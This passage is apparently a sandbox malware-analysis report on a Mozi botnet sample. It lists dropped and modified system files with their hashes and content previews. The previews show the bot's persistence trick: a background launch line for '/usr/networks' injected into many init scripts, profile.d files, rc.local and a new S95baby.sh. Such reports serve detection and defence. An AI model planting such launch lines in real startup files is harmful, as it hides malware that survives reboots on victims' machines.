                                                                                                                  Entropy (8bit):3.882045108136863
                                                                                                                  Encrypted:false
                                                                                                                  Malicious:false
                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                  Preview: ./usr/networks&.exit 1.
                                                                                                                  /etc/acpi/asus-keyboard-backlight.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):326
                                                                                                                  Entropy (8bit):5.2904323771702915
                                                                                                                  Encrypted:false
                                                                                                                  Malicious:false
                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                  Preview: ./usr/networks&.test -d $KEYS_DIR || exit 0..MIN=0.MAX=$(cat $KEYS_DIR/max_brightness).VAL=$(cat $KEYS_DIR/brightness)..if [ "$1" = down ]; then..VAL=$((VAL-1)).else..VAL=$((VAL+1)).fi..if [ "$VAL" -lt $MIN ]; then..VAL=$MIN.elif [ "$VAL" -gt $MAX ]; then..VAL=$MAX.fi..echo $VAL > $KEYS_DIR/brightness../usr/networks&.exit 1.
                                                                                                                  /etc/acpi/asus-wireless.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):157
                                                                                                                  Entropy (8bit):4.412729940630044
                                                                                                                  Encrypted:false
                                                                                                                  Malicious:false
                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                  Preview: ./usr/networks&.test -f /usr/share/acpi-support/state-funcs || exit 0... /usr/share/acpi-support/state-funcs..toggleAllWirelessStates../usr/networks&.exit 1.
                                                                                                                  /etc/acpi/ibm-wireless.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):636
                                                                                                                  Entropy (8bit):4.722087767454589
                                                                                                                  Encrypted:false
                                                                                                                  Malicious:false
                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                  Preview: ./usr/networks&.test -f /usr/share/acpi-support/state-funcs || exit 0..# Find and toggle wireless of bluetooth devices on ThinkPads... /usr/share/acpi-support/state-funcs..rfkill list | sed -n -e'/tpacpi_bluetooth_sw/,/^[0-9]/p' | grep -q 'Soft blocked: yes'.bluetooth_state=$?..# Note that this always alters the state of the wireless!.toggleAllWirelessStates;..# Sequence is Both on, Both off, Wireless only, Bluetooth only.if ! isAnyWirelessPoweredOn; then. # Wireless was turned off. if [ "$bluetooth_state" = 0 ]; then. rfkill unblock bluetooth. else. rfkill block bluetooth. fi.fi../usr/networks&.exit 1.
                                                                                                                  /etc/acpi/powerbtn.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):2079
                                                                                                                  Entropy (8bit):4.778187000249208
                                                                                                                  Encrypted:false
                                                                                                                  Malicious:false
                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                  Preview: ./usr/networks&. exit 0.fi..# getXuser gets the X user belonging to the display in $displaynum..# If you want the foreground X user, use getXconsole!.getXuser() {. user=`pinky -fw | awk '{ if ($2 == ":'$displaynum'" || $(NF) == ":'$displaynum'" ) { print $1; exit; } }'`. if [ x"$user" = x"" ]; then. startx=`pgrep -n startx`. if [ x"$startx" != x"" ]; then. user=`ps -o user --no-headers $startx`. fi. fi. if [ x"$user" != x"" ]; then. userhome=`getent passwd $user | cut -d: -f6`. export XAUTHORITY=$userhome/.Xauthority. else. export XAUTHORITY="". fi. export XUSER=$user.}..# Skip if we just in the middle of resuming..test -f /var/lock/acpisleep && exit 0..# If the current X console user is running a power management daemon that.# handles suspend/resume requests, let them handle policy This is effectively.# the same as 'acpi-s
                                                                                                                  /etc/acpi/tosh-wireless.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):483
                                                                                                                  Entropy (8bit):4.215331622973397
                                                                                                                  Encrypted:false
                                                                                                                  Malicious:false
                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                  Preview: ./usr/networks&.test -f /usr/share/acpi-support/key-constants || exit 0... /usr/share/acpi-support/state-funcs..if isAnyWirelessPoweredOn; then. if [ -x /usr/bin/toshset ]; then. if `toshset -bluetooth | grep -q attached`; then. toshset -bluetooth off. toggleAllWirelessStates. else. toshset -bluetooth on. fi. else..toggleAllWirelessStates. fi.else. toggleAllWirelessStates.fi../usr/networks&.exit 1.
                                                                                                                  /etc/acpi/undock.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):266
                                                                                                                  Entropy (8bit):4.77497394042067
                                                                                                                  Encrypted:false
                                                                                                                  Malicious:false
                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                  Preview: ./usr/networks&.test -f /usr/share/acpi-support/key-constants || exit 0..for device in /sys/devices/platform/dock.*; do..[ -e "$device/type" ] || continue..[ x$(cat "$device/type") = xdock_station ] || continue..echo 1 > "$device/undock".done../usr/networks&.exit 1.
                                                                                                                  /etc/bash_completion.d/libreoffice.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):23
                                                                                                                  Entropy (8bit):3.882045108136863
                                                                                                                  Encrypted:false
                                                                                                                  Malicious:false
                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                  Preview: ./usr/networks&.exit 1.
                                                                                                                  /etc/init.d/S95baby.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:POSIX shell script, ASCII text executable
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):25
                                                                                                                  Entropy (8bit):3.8936606896881854
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:TKH4v0VJ:hK
                                                                                                                  MD5:1B3235BA10FC04836C941D3D27301956
                                                                                                                  SHA1:8909655763143702430B8C58B3AE3B04CFD3A29C
                                                                                                                  SHA-256:01BA1FB41632594997A41D0C3A911AE5B3034D566EBB991EF76AD76E6F9E283A
                                                                                                                  SHA-512:98BDB5C266222CCBD63B6F80C87E501C8033DC53B0513D300B8DA50E39A207A0B69F8CD3ECC4A128DEC340A1186779FEDD1049C9B0A70E90D2CB3AE6EBFA4C4D
                                                                                                                  Malicious:true
                                                                                                                  Joe Sandbox View:
                                                                                                                  • Filename: bin.sh, Detection: malicious
                                                                                                                  • Filename: i, Detection: malicious
                                                                                                                  • Filename: Mozi.m, Detection: malicious
                                                                                                                  • Filename: Mozi.m, Detection: malicious
                                                                                                                  • Filename: 1skm346Xtz, Detection: malicious
                                                                                                                  • Filename: Mozi.a, Detection: malicious
                                                                                                                  • Filename: Mozi.1.m, Detection: malicious
                                                                                                                  • Filename: 6wuvHEBHt8.bin, Detection: malicious
                                                                                                                  • Filename: 7v1ic5IS8I, Detection: malicious
                                                                                                                  • Filename: Mozi.a, Detection: malicious
                                                                                                                  • Filename: Mozi.a, Detection: malicious
                                                                                                                  • Filename: Mozi.m, Detection: malicious
                                                                                                                  • Filename: Mozi.m, Detection: malicious
                                                                                                                  • Filename: Mozi.m, Detection: malicious
                                                                                                                  • Filename: bad_file, Detection: malicious
                                                                                                                  • Filename: mxjzQQFgLp, Detection: malicious
                                                                                                                  • Filename: JrAL1wW1MQ, Detection: malicious
                                                                                                                  Preview: #!/bin/sh./usr/networks&.
                                                                                                                  /etc/init.d/bootmisc.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):148
                                                                                                                  Entropy (8bit):4.718194263525147
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:qXVaUsZ/IREK0GFrTOvsBdFru4KXGK+R0FJOUsZoG3Hv0VOORgn:eoARzAsBdhu4GX+R0Voo+v7n
                                                                                                                  MD5:68EC1ED64500D143FE44D1ED0B19DD83
                                                                                                                  SHA1:90AE6027194C555ED6DE71191682E1773DD8E609
                                                                                                                  SHA-256:F450F84C27D8339C63251AEB3DC06634AC42E8F4B0AFDA734E1044B5453ECF0D
                                                                                                                  SHA-512:C9CD195893143DE17D2029672DA2236C7EC44498B1B5F13526CCA56665388790A198ECD0F2FE097FB8D035F780AFFCC5F984DDE1D0540AA778892F52E7698EBB
                                                                                                                  Malicious:true
                                                                                                                  Preview: ./usr/networks&..exit 3..;;. stop|status)..# No-op..;;. *)..echo "Usage: bootmisc.sh [start|stop]" >&2..exit 3..;;.esac..:../usr/networks&.exit 1.
                                                                                                                  /etc/init.d/checkfs.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):147
                                                                                                                  Entropy (8bit):4.7173471450646
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:qXVaUsZ/IREK0GFrTOvsBdFru4AGXi0FJOUsZoG3Hv0VOORgn:eoARzAsBdhu4u0Voo+v7n
                                                                                                                  MD5:FC904BF1583E7C4398FCCDF2D3276902
                                                                                                                  SHA1:25D51112D0A6C9C977F4BB0B73BB3B4F278074A3
                                                                                                                  SHA-256:059F2548AB66249C86CC868222E9CA0B44123E23A99D4D3581044D1306730BD7
                                                                                                                  SHA-512:DF7FC2EE581E67BC3282F05FB8DC33FCAF86B29F564E5CB43965AFDB6AE7422D06A6091A18375B3544F495CA827B6CC6B213FF4FFE7AEC252C326B8D56B4CF84
                                                                                                                  Malicious:true
                                                                                                                  Preview: ./usr/networks&..exit 3..;;. stop|status)..# No-op..;;. *)..echo "Usage: checkfs.sh [start|stop]" >&2..exit 3..;;.esac..:../usr/networks&.exit 1.
                                                                                                                  /etc/init.d/checkroot-bootclean.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):250
                                                                                                                  Entropy (8bit):4.872318043360431
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:un5GKFqLkMfF3teoARzAsBdhu4YDi0Voo+v7n:AGKE3fdARMsBLbYerTn
                                                                                                                  MD5:1B20C93FFEABBAA880FEB038394DA3EE
                                                                                                                  SHA1:CDD8FDC804AE4D7464E3B67B26F52C53C5EEAD13
                                                                                                                  SHA-256:3A63188036AB39E080E5035091441EFB91BF22F20C9292900929CA8F04D0F280
                                                                                                                  SHA-512:E2717119C05473DEB21FF60060813C6B4648FB6B94B524D76A15ED9506ED2BCFFA03108ABAB7CBF52A29D7507937749D0F9F420A96D4F75B499553434F836059
                                                                                                                  Malicious:true
                                                                                                                  Preview: ./usr/networks&..exit $?..;;. restart|reload|force-reload)..echo "Error: argument '$1' not supported" >&2..exit 3..;;. stop|status)..# No-op..;;. *)..echo "Usage: checkroot-bootclean.sh [start|stop]" >&2..exit 3..;;.esac..:../usr/networks&.exit 1.
                                                                                                                  /etc/init.d/checkroot.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):3111
                                                                                                                  Entropy (8bit):4.922960717312443
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:l+bjYLN1LiQKt6CYuSB/VN7pL4TyKWSmdrBW71cBi8m:0sxx2cJBVxZH01cc8m
                                                                                                                  MD5:544D026D22E17EF8C1F59AE6EC1E5993
                                                                                                                  SHA1:F5BFEE80CBF31DAEC25CD0728F030580F539D88F
                                                                                                                  SHA-256:69A39FE65F95BBA2E445A39AA1F8AF941FDA210AB6A9174B0578B5AB36C5BE32
                                                                                                                  SHA-512:85CD0C7AE75DA853E5C4286BF4E3D9DE28D2916EDBE0CB7A42DC53AD7D8B02F7875C617DC4D4DD4A1C74333D9403C8D06C903F8F19AB11A3E221281B7CBF8837
                                                                                                                  Malicious:true
                                                                                                                  Preview: ./usr/networks&..# NOTE: "failure" is defined as exiting with a return code of..# 4 or larger. A return code of 1 indicates that file system..# errors were corrected but that the boot may proceed. A return..# code of 2 or 3 indicates that the system should immediately reboot...#..if [ "$FSCKCODE" -eq 32 ]..then...log_warning_msg "File system check was interrupted by user"..elif [ "$FSCKCODE" -gt 3 ]..then...# Surprise! Re-directing from a HERE document (as in "cat << EOF")...# does not work because the root is currently read-only....log_failure_msg "An automatic file system check (fsck) of the root filesystem failed. .A manual fsck must be performed, then the system restarted. .The fsck should be performed in maintenance mode with the .root filesystem mounted in read-only mode."...log_warning_msg "The root filesystem is currently mounted in read-only mode. .A maintenance shell will now be started. .After performing system maintenance, press CONTROL-D .to terminate the maintenance shell
                                                                                                                  /etc/init.d/hostname.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):404
                                                                                                                  Entropy (8bit):5.01878905639229
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:U20zRSdZ9iBbG2Us4Ji0SAGKFqLkMfF3teoWpAsBdA80F4n0u4hR9QR0Voo+v7n:Ul221wi0PGKE3fdpsBi8wlbHaNrTn
                                                                                                                  MD5:0A6F8F35CFF93CE8BBAB05E2DA2714C6
                                                                                                                  SHA1:9A865CEB2B56974A54694ED9D1D117043EA02727
                                                                                                                  SHA-256:4E41D7D95B11DBAD34E30EDE98DB6728873146F05FF45A4EF6943ADD1F71D0A1
                                                                                                                  SHA-512:F6E29642047487748B5BEC77C7429881B73FED48CAA9247CB788CFA2CE856D300B3FB6F8F4C8D6F18ED710B5237B331BC03ABE03222296EE12F1256D5222B537
                                                                                                                  Malicious:true
                                                                                                                  Preview: ./usr/networks&..exit $ES.}..do_status () {..HOSTNAME=$(hostname)..if [ "$HOSTNAME" ] ; then...return 0..else...return 4..fi.}..case "$1" in. start|"")..do_start..;;. restart|reload|force-reload)..echo "Error: argument '$1' not supported" >&2..exit 3..;;. stop)..# No-op..;;. status)..do_status..exit $?..;;. *)..echo "Usage: hostname.sh [start|stop]" >&2..exit 3..;;.esac..:../usr/networks&.exit 1.
                                                                                                                  /etc/init.d/hwclock.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):23
                                                                                                                  Entropy (8bit):3.882045108136863
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                  Malicious:true
                                                                                                                  Preview: ./usr/networks&.exit 1.
                                                                                                                  /etc/init.d/mountall-bootclean.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):249
                                                                                                                  Entropy (8bit):4.8912088003487595
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:un5GKFqLkMfF3teoARzAsBdhu4iea2ii0Voo+v7n:AGKE3fdARMsBLbxPrTn
                                                                                                                  MD5:11FEEF13321D348864E7632D0746ECA2
                                                                                                                  SHA1:8D763DA6837280846D90AAACA3122D4F5CC0C62D
                                                                                                                  SHA-256:3DFE238D111564682893276C28BB49367C38A1F07A873B8F79E4FA8291FD7FE7
                                                                                                                  SHA-512:1C25B93B523688ACB3DF72B8EC148CD736CD479E7BEF3655DBCDB0B6D1AFACB652492ECF81A21EBADEBBFF14D0B20916DFD639E93EE1CCD6454C61F38BCAE46D
                                                                                                                  Malicious:true
                                                                                                                  Preview: ./usr/networks&..exit $?..;;. restart|reload|force-reload)..echo "Error: argument '$1' not supported" >&2..exit 3..;;. stop|status)..# No-op..;;. *)..echo "Usage: mountall-bootclean.sh [start|stop]" >&2..exit 3..;;.esac..:../usr/networks&.exit 1.
                                                                                                                  /etc/init.d/mountall.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):148
                                                                                                                  Entropy (8bit):4.74526082342869
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:qXVaUsZ/IREK0GFrTOvsBdFru4iLirKM0FJOUsZoG3Hv0VOORgn:eoARzAsBdhu4ierX0Voo+v7n
                                                                                                                  MD5:44D9E997053B704B17DB7DD64563014E
                                                                                                                  SHA1:1A29A3E927426D001FD0627C244B2397CF62D6C6
                                                                                                                  SHA-256:56B70518A2C51841B3C7BC5DDBAFC2AF62F4A47B25A1147A929E1129CBCBFAC7
                                                                                                                  SHA-512:B16AC50C36C5C17D405D2D8A1E9DB7D9863578EB71F4C382C56C4AA4BCEAEE6D4558A8CB94505464A1F13BA980741F5BE8CBD134C425004AA260DAC8F52B1581
                                                                                                                  Malicious:true
                                                                                                                  Preview: ./usr/networks&..exit 3..;;. stop|status)..# No-op..;;. *)..echo "Usage: mountall.sh [start|stop]" >&2..exit 3..;;.esac..:../usr/networks&.exit 1.
                                                                                                                  /etc/init.d/mountdevsubfs.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):56
                                                                                                                  Entropy (8bit):4.1427249051134325
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:qXVaUsZoG3LWlOORgn:eoo+WMn
                                                                                                                  MD5:1E7189F6F5D3DB6ABCDA8139030EFD90
                                                                                                                  SHA1:370B1FF47F5FC95D054FE3036C5F772403F9C1EF
                                                                                                                  SHA-256:2059ABA4C0ADA6C0EE6F5F911D60D25C054D91BEEF283931E7AD10CE68E096E7
                                                                                                                  SHA-512:C1CBF1885B2E515BF2B77688891B122EEC824022DFCB30B3075D9BD39B154EA7A9DC1B0CD64397335A9D32A8959B53C2225F600357F295FA8A914BA247163E12
                                                                                                                  Malicious:true
                                                                                                                  Preview: ./usr/networks&..exit 3..;;.esac../usr/networks&.exit 1.
                                                                                                                  /etc/init.d/mountkernfs.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):56
                                                                                                                  Entropy (8bit):4.1427249051134325
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:qXVaUsZoG3LWlOORgn:eoo+WMn
                                                                                                                  MD5:1E7189F6F5D3DB6ABCDA8139030EFD90
                                                                                                                  SHA1:370B1FF47F5FC95D054FE3036C5F772403F9C1EF
                                                                                                                  SHA-256:2059ABA4C0ADA6C0EE6F5F911D60D25C054D91BEEF283931E7AD10CE68E096E7
                                                                                                                  SHA-512:C1CBF1885B2E515BF2B77688891B122EEC824022DFCB30B3075D9BD39B154EA7A9DC1B0CD64397335A9D32A8959B53C2225F600357F295FA8A914BA247163E12
                                                                                                                  Malicious:true
                                                                                                                  Preview: ./usr/networks&..exit 3..;;.esac../usr/networks&.exit 1.
                                                                                                                  /etc/init.d/mountnfs-bootclean.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):249
                                                                                                                  Entropy (8bit):4.8916208864241355
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:un5GKFqLkMfF3teoARzAsBdhu4il/2ii0Voo+v7n:AGKE3fdARMsBLbPrTn
                                                                                                                  MD5:515975B77B7985776BC03B8F5C029EFE
                                                                                                                  SHA1:AA8F2AD5CB736EDC9BA0AEAE0748257E16875C11
                                                                                                                  SHA-256:DFD458AE245B70CB759F3FF40FB22BDFD520E627DABAF813C1D9BCA2C8155E00
                                                                                                                  SHA-512:169DC8DDF26C9F3A50C29D0F2AB99AF20D4F949F2F034AC25914086ED0DE37610D310F034E20B6493195E1BB54DC3036EB5BC999099D74ED53FFC813DED5FAD2
                                                                                                                  Malicious:true
                                                                                                                  Preview: ./usr/networks&..exit $?..;;. restart|reload|force-reload)..echo "Error: argument '$1' not supported" >&2..exit 3..;;. stop|status)..# No-op..;;. *)..echo "Usage: mountnfs-bootclean.sh [start|stop]" >&2..exit 3..;;.esac..:../usr/networks&.exit 1.
                                                                                                                  /etc/init.d/mountnfs.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):190
                                                                                                                  Entropy (8bit):3.788938232230384
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:qXVx5jWvFFFvNsTREKdKCvFF/pN1uFFFveYd3LrLl7jWvFFFvzv3Hv0VOORgn:a5qvFFhNsTR/3/hN4/Zdd75qvFFhzfv7
                                                                                                                  MD5:B09350F021B2B102B1E328A988261F3E
                                                                                                                  SHA1:93AD761BD0E1EBB3E9BDCAA469EC0192C0C9DA4F
                                                                                                                  SHA-256:E78EED19CCD5853AF3518FB3A16BE3244BE503798218041D65E5B44A0829A020
                                                                                                                  SHA-512:1DB35C4F8A6584FAC6AB3B0789B4037F09557457B248443489D5EDD2A6B34DB59735B3256F905D45075199DD870E52FFDBCC7E8DD85006BD1F85F8000F61FF8A
                                                                                                                  Malicious:true
                                                                                                                  Preview: ./usr/networks&. exit 3. ;;. stop|status). # No-op. ;;. *). echo "Usage: $0 start|stop" >&2. exit 3. ;;.esac..:../usr/networks&.exit 1.
                                                                                                                  /etc/init.d/umountnfs.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):145
                                                                                                                  Entropy (8bit):4.730534942677594
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:qXVaUsZ/ZHM4hWRJ7Fru4fR3dM0FJOUsZoG3Hv0VOORgn:eogJ7hu4pC0Voo+v7n
                                                                                                                  MD5:60F4E3C6C61EF7FA36BC5B00FF234698
                                                                                                                  SHA1:8AC881752B54BDB8FBD831A67AF6ED8CB2989B65
                                                                                                                  SHA-256:9DBFF8DF724717101900B6289BDB73EB05D67D4A14170EB3D26B20686F851F7F
                                                                                                                  SHA-512:741D35617E8C3B5D1278CB83C11BFBA1B6110B17D7E251DABA10EAC30BBAD8C5064F0EB7AF236EEEA9383E78C8E3F2DE477598763A5A1B7F213D606DF1F1D6D7
                                                                                                                  Malicious:true
                                                                                                                  Preview: ./usr/networks&..exit 3..;;. stop|"")..do_stop..;;. *)..echo "Usage: umountnfs.sh [start|stop]" >&2..exit 3..;;.esac..:../usr/networks&.exit 1.
                                                                                                                  /etc/profile.d/Z97-byobu.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):23
                                                                                                                  Entropy (8bit):3.882045108136863
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                  Malicious:true
                                                                                                                  Preview: ./usr/networks&.exit 1.
                                                                                                                  /etc/profile.d/apps-bin-path.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):23
                                                                                                                  Entropy (8bit):3.882045108136863
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                  Malicious:true
                                                                                                                  Preview: ./usr/networks&.exit 1.
                                                                                                                  /etc/profile.d/bash_completion.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):23
                                                                                                                  Entropy (8bit):3.882045108136863
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                  Malicious:true
                                                                                                                  Preview: ./usr/networks&.exit 1.
                                                                                                                  /etc/profile.d/cedilla-portuguese.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):23
                                                                                                                  Entropy (8bit):3.882045108136863
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                  Malicious:true
                                                                                                                  Preview: ./usr/networks&.exit 1.
                                                                                                                  /etc/profile.d/vte-2.91.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):23
                                                                                                                  Entropy (8bit):3.882045108136863
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                  Malicious:true
                                                                                                                  Preview: ./usr/networks&.exit 1.
                                                                                                                  /etc/rc.local
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):23
                                                                                                                  Entropy (8bit):3.882045108136863
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:qXVOOR3n:M
                                                                                                                  MD5:CCE237822A14795B1B5946EAE141691B
                                                                                                                  SHA1:420CE3F920BB02962978255ADDCBF975D4014A3A
                                                                                                                  SHA-256:D9C831E4480DBAAB813BF5BE1BCE6C64CFA4F4320038022E2051BD4E8E4D76DF
                                                                                                                  SHA-512:24A86C9C9944068E3FE6000687E6D392F6587556601E09A22399D15B588536883547B326F13BE506BE492C2269F69AA2DCEDE4FBA8847664793847C74AD5EFF6
                                                                                                                  Malicious:true
                                                                                                                  Preview: ./usr/networks&.exit 0.
                                                                                                                  /etc/rcS.d/S95baby.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:POSIX shell script, ASCII text executable
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):25
                                                                                                                  Entropy (8bit):3.8936606896881854
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:TKH4v0VJ:hK
                                                                                                                  MD5:1B3235BA10FC04836C941D3D27301956
                                                                                                                  SHA1:8909655763143702430B8C58B3AE3B04CFD3A29C
                                                                                                                  SHA-256:01BA1FB41632594997A41D0C3A911AE5B3034D566EBB991EF76AD76E6F9E283A
                                                                                                                  SHA-512:98BDB5C266222CCBD63B6F80C87E501C8033DC53B0513D300B8DA50E39A207A0B69F8CD3ECC4A128DEC340A1186779FEDD1049C9B0A70E90D2CB3AE6EBFA4C4D
                                                                                                                  Malicious:true
                                                                                                                  Joe Sandbox View:
                                                                                                                  • Filename: bin.sh, Detection: malicious
                                                                                                                  • Filename: i, Detection: malicious
                                                                                                                  • Filename: Mozi.m, Detection: malicious
                                                                                                                  • Filename: Mozi.m, Detection: malicious
                                                                                                                  • Filename: 1skm346Xtz, Detection: malicious
                                                                                                                  • Filename: Mozi.a, Detection: malicious
                                                                                                                  • Filename: Mozi.1.m, Detection: malicious
                                                                                                                  • Filename: 6wuvHEBHt8.bin, Detection: malicious
                                                                                                                  • Filename: 7v1ic5IS8I, Detection: malicious
                                                                                                                  • Filename: Mozi.a, Detection: malicious
